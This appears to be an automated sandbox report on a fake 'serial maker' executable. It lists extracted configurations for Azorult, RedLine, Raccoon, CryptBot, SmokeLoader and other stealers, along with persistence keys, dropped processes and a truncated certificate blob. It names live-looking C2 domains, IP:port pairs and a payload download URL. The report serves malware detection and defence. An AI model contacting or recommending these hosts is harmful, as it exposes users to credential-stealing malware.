Analysis
-
max time kernel
28s -
max time network
302s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
25-03-2021 18:17
Static task
static1
Behavioral task
behavioral1
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral6
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
General
-
Target
3d_Video_Player_4_5_serial_maker.exe
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
dfa7b4d385486b737f84d608857eb43733ffd299
-
url4cnc
https://telete.in/j9ca1pel
Extracted
fickerstealer
deniedfight.com:80
Extracted
redline
werqy
werqy66.top:80
Extracted
redline
ALLSupp 2
94.103.94.239:3214
Extracted
redline
ALLSupp 1
94.103.94.239:3214
Extracted
redline
19test200
erherst.tk:80
Extracted
redline
btchochu
144.76.184.5:40355
Extracted
metasploit
windows/single_exec
Extracted
cryptbot
baqsw42.top
morryv04.top
-
payload_url
http://aktyd05.top/download.php?file=lv.exe
Extracted
smokeloader
2020
http://xsss99.icu/upload/
http://bingooodsg.icu/upload/
http://junntd.xyz/upload/
http://ginessa11.xyz/upload/
http://overplayninsx.xyz/upload/
http://bananinze.com/upload/
http://daunimlas.com/upload/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
CryptBot Payload 2 IoCs
resource yara_rule behavioral5/memory/7512-530-0x0000000002500000-0x00000000025DF000-memory.dmp family_cryptbot behavioral5/memory/7512-531-0x0000000000400000-0x00000000004E3000-memory.dmp family_cryptbot -
Glupteba Payload 6 IoCs
resource yara_rule behavioral5/memory/6892-473-0x0000000002E80000-0x000000000378A000-memory.dmp family_glupteba behavioral5/memory/6892-472-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral5/memory/6892-474-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral5/memory/4408-519-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral5/memory/4408-521-0x0000000003830000-0x000000000408D000-memory.dmp family_glupteba behavioral5/memory/4408-522-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
resource yara_rule behavioral5/memory/5548-316-0x0000000000400000-0x0000000000432000-memory.dmp family_redline behavioral5/memory/4300-373-0x00000000032D0000-0x0000000003300000-memory.dmp family_redline behavioral5/memory/4300-375-0x0000000003400000-0x000000000342E000-memory.dmp family_redline behavioral5/memory/3148-382-0x0000000002D80000-0x0000000002DB0000-memory.dmp family_redline behavioral5/memory/3148-387-0x00000000056F0000-0x000000000571E000-memory.dmp family_redline behavioral5/memory/412-401-0x0000000003590000-0x00000000035B3000-memory.dmp family_redline behavioral5/memory/412-404-0x0000000003620000-0x0000000003642000-memory.dmp family_redline behavioral5/memory/6240-423-0x0000000005730000-0x000000000575F000-memory.dmp family_redline behavioral5/memory/6240-421-0x00000000032A0000-0x00000000032D1000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 3 IoCs
resource yara_rule behavioral5/memory/5128-317-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral5/memory/5128-328-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral5/memory/5128-367-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
pid Process 4060 keygen-pr.exe 4052 keygen-step-1.exe 2076 keygen-step-3.exe 4420 keygen-step-4.exe 1468 key.exe 1780 Setup.exe 4652 multitimer.exe 4628 setups.exe 224 askinstall20.exe 212 setups.tmp 2924 multitimer.exe 2056 md2_2efs.exe 1968 multitimer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 212 setups.tmp 212 setups.tmp 212 setups.tmp 212 setups.tmp 212 setups.tmp 212 setups.tmp 212 setups.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral5/memory/4300-331-0x0000000000400000-0x0000000000EFA000-memory.dmp themida behavioral5/memory/3148-333-0x0000000000400000-0x0000000000F83000-memory.dmp themida behavioral5/memory/412-368-0x0000000000400000-0x0000000000FE1000-memory.dmp themida behavioral5/memory/6240-383-0x0000000000400000-0x0000000000FD9000-memory.dmp themida behavioral5/memory/8580-676-0x0000000000400000-0x0000000000EFA000-memory.dmp themida behavioral5/memory/8804-679-0x0000000000400000-0x0000000000F83000-memory.dmp themida behavioral5/memory/6088-681-0x0000000000400000-0x0000000000EFA000-memory.dmp themida behavioral5/memory/7600-686-0x0000000000400000-0x0000000000F83000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cwnhxim1wrq = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OLMZPKVNFT\\multitimer.exe\" 1 3.1616696293.605cd3e5ee8ba" multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 259 checkip.amazonaws.com 103 ipinfo.io 106 ipinfo.io 132 api.ipify.org 143 checkip.amazonaws.com 145 ip-api.com 235 ip-api.com 241 checkip.amazonaws.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 3144 3048 WerFault.exe 114 220 3800 WerFault.exe 240 2632 6940 WerFault.exe 227 196 5604 WerFault.exe 230 -
Delays execution with timeout.exe 5 IoCs
pid Process 5400 timeout.exe 4980 timeout.exe 8464 timeout.exe 5908 timeout.exe 6756 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 13 IoCs
pid Process 3392 taskkill.exe 7300 taskkill.exe 7616 taskkill.exe 8328 taskkill.exe 8752 taskkill.exe 8336 taskkill.exe 3948 taskkill.exe 7888 taskkill.exe 7548 taskkill.exe 7444 taskkill.exe 2656 taskkill.exe 5836 taskkill.exe 5948 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{346D82EE-F099-427E-B75F-28A2763CB37E} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "t0ug3do" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 21b53bb7a321d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000023c6f79a5b984952adbdcf5ea4793a4bd3c1b2133f75108608b7d32cacdd64dbcaa5d0d160991fe893daab7898b64ea8bb6ce862b302769b4238 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a034863268747470